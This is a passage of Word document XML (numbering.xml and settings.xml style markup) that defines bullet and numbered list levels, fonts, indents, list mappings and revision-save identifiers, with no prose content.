        <w:ind w:left="1584" w:hanging="1584"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3280AA08"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7840AADC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1060" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol"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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="331561B0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="31F4C83A"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1060"/>
        </w:tabs>
        <w:ind w:left="1060" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="178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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="36F91D41"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D4B4B39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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="391526B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE44C3FE"/>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395D3019"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE7AEB02"/>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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="396A698D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A46B21C"/>
    <w:lvl w:ilvl="0" w:tplc="BEE4D71A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="700" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet M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AF931C5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08FE375C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="440" w:hanging="440"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="5"/>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CAEAFF0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AD5E7AE4"/>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18" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3E3D6D4C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="31FAB1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2A856EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C84A343E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="700" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1420" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2140" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2860" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="3580" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="4300" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="5020" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="5740" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="6460" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="42BDC287"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F6940D04"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1068" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1788" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2508" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="3228" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="3948" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="4668" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="5388" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="6108" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="6828" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4BCF1A3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18CA47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4FA2F725"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7CAA0C4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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5C8397F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A002EA0E"/>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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="61C74A0E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC9E78CC"/>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61D55F47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="989C46CA"/>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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="766B84BB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="872416B8"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1060" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1780" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="2500" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="3220" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="3940" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="4660" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="5380" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="6100" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="6820" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7C121143"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B63A53CA"/>
    <w:lvl w:ilvl="0" w:tplc="BEE4D71A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="700" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="08090003">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1420" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="08090005">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2140" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="08090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2860" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="08090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3580" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="08090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4300" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="08090001" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5020" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="08090003" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5740" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="08090005" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6460" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="611474184">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1805075606">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1863743620">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="150296059">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1254586655">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="904678948">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1967420403">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1546602308">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="344290925">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="3438214">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1743748294">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1606694973">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="463741028">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1556358683">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1116827201">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="538591925">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="669334663">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1859074533">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1622298270">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1150442170">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1107695775">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1430615586">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="830289410">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="868300158">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="601567564">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1150487393">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1053231984">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="188089130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doNotTrackMoves/>
  <w:defaultTabStop w:val="708"/>
  <w:autoHyphenation/>
  <w:characterSpacingControl w:val="doNotCompress"/>
  <w:hdrShapeDefaults>
    <o:shapedefaults v:ext="edit" spidmax="2096"/>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="1"/>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7DF5E8"/>
    <w:rsid w:val="00000A6F"/>
    <w:rsid w:val="000028AA"/>
    <w:rsid w:val="000046CF"/>
    <w:rsid w:val="00005863"/>
    <w:rsid w:val="00006A49"/>
    <w:rsid w:val="00011B39"/>
    <w:rsid w:val="00012743"/>
    <w:rsid w:val="0001493A"/>
    <w:rsid w:val="000152A2"/>
    <w:rsid w:val="00016E7E"/>
    <w:rsid w:val="00017DE0"/>
    <w:rsid w:val="0002169F"/>
    <w:rsid w:val="00025578"/>
    <w:rsid w:val="0002569A"/>
    <w:rsid w:val="0002586C"/>
    <w:rsid w:val="00025FDC"/>
    <w:rsid w:val="00026DE0"/>
    <w:rsid w:val="00027444"/>
    <w:rsid w:val="00027782"/>
    <w:rsid w:val="00031EA1"/>
    <w:rsid w:val="00035060"/>
    <w:rsid w:val="0003599A"/>
    <w:rsid w:val="000362F2"/>
    <w:rsid w:val="00036957"/>
    <w:rsid w:val="00036D1E"/>
    <w:rsid w:val="000375EB"/>
    <w:rsid w:val="000403FD"/>
    <w:rsid w:val="000432DB"/>
    <w:rsid w:val="000455C5"/>
    <w:rsid w:val="00046655"/>
    <w:rsid w:val="00046A62"/>
    <w:rsid w:val="00050598"/>
    <w:rsid w:val="00050E15"/>
    <w:rsid w:val="000518F1"/>
    <w:rsid w:val="00052BC8"/>
    <w:rsid w:val="000543D2"/>
    <w:rsid w:val="00054F14"/>
    <w:rsid w:val="0006068C"/>
    <w:rsid w:val="000624E1"/>
    <w:rsid w:val="00063B20"/>
    <w:rsid w:val="00065462"/>
    <w:rsid w:val="00065852"/>
    <w:rsid w:val="000658EB"/>
    <w:rsid w:val="000668A0"/>
    <w:rsid w:val="00066F69"/>
    <w:rsid w:val="00071796"/>
    <w:rsid w:val="00073903"/>
    <w:rsid w:val="000739BD"/>
    <w:rsid w:val="00075A3B"/>
    <w:rsid w:val="00075B25"/>
    <w:rsid w:val="000825E5"/>
    <w:rsid w:val="000845B2"/>
    <w:rsid w:val="00085BF9"/>
    <w:rsid w:val="000878E0"/>
    <w:rsid w:val="00090C08"/>
    <w:rsid w:val="00092607"/>
    <w:rsid w:val="000930B3"/>
    <w:rsid w:val="0009552A"/>
    <w:rsid w:val="00097B2E"/>
    <w:rsid w:val="000A24A3"/>
    <w:rsid w:val="000A4492"/>
    <w:rsid w:val="000A5176"/>
    <w:rsid w:val="000A58FB"/>
    <w:rsid w:val="000A74A8"/>
    <w:rsid w:val="000B22C3"/>
    <w:rsid w:val="000B2AAF"/>
    <w:rsid w:val="000B5914"/>
    <w:rsid w:val="000C092B"/>
    <w:rsid w:val="000C165B"/>
    <w:rsid w:val="000C1FC5"/>
    <w:rsid w:val="000C51F7"/>
    <w:rsid w:val="000C6411"/>
    <w:rsid w:val="000C6601"/>
    <w:rsid w:val="000C760F"/>
    <w:rsid w:val="000D0071"/>
    <w:rsid w:val="000D00A9"/>
    <w:rsid w:val="000D121C"/>
    <w:rsid w:val="000D1510"/>
    <w:rsid w:val="000D157A"/>
    <w:rsid w:val="000D2C02"/>
    <w:rsid w:val="000D3727"/>
    <w:rsid w:val="000D43B4"/>
    <w:rsid w:val="000D6592"/>
    <w:rsid w:val="000D79BC"/>
    <w:rsid w:val="000E02BD"/>
    <w:rsid w:val="000E046D"/>
    <w:rsid w:val="000E1E1D"/>
    <w:rsid w:val="000E2F81"/>
    <w:rsid w:val="000E36ED"/>
    <w:rsid w:val="000E402C"/>
    <w:rsid w:val="000E4644"/>
    <w:rsid w:val="000E5685"/>
    <w:rsid w:val="000E593B"/>
    <w:rsid w:val="000E5B6A"/>
    <w:rsid w:val="000E6128"/>
    <w:rsid w:val="000E64CF"/>
    <w:rsid w:val="000E6EA2"/>
    <w:rsid w:val="000E700B"/>
    <w:rsid w:val="000E735B"/>
    <w:rsid w:val="000E79AF"/>
    <w:rsid w:val="000F0362"/>
    <w:rsid w:val="000F2002"/>
    <w:rsid w:val="000F25E1"/>
    <w:rsid w:val="000F4CC4"/>
    <w:rsid w:val="000F59E2"/>
    <w:rsid w:val="000F68CC"/>
    <w:rsid w:val="00100050"/>
    <w:rsid w:val="001005C3"/>
    <w:rsid w:val="00100876"/>
    <w:rsid w:val="0010092F"/>
    <w:rsid w:val="00102BBD"/>
    <w:rsid w:val="00104886"/>
    <w:rsid w:val="00104A2D"/>
    <w:rsid w:val="0010643C"/>
    <w:rsid w:val="001065B9"/>
    <w:rsid w:val="001072A4"/>
    <w:rsid w:val="001115C8"/>
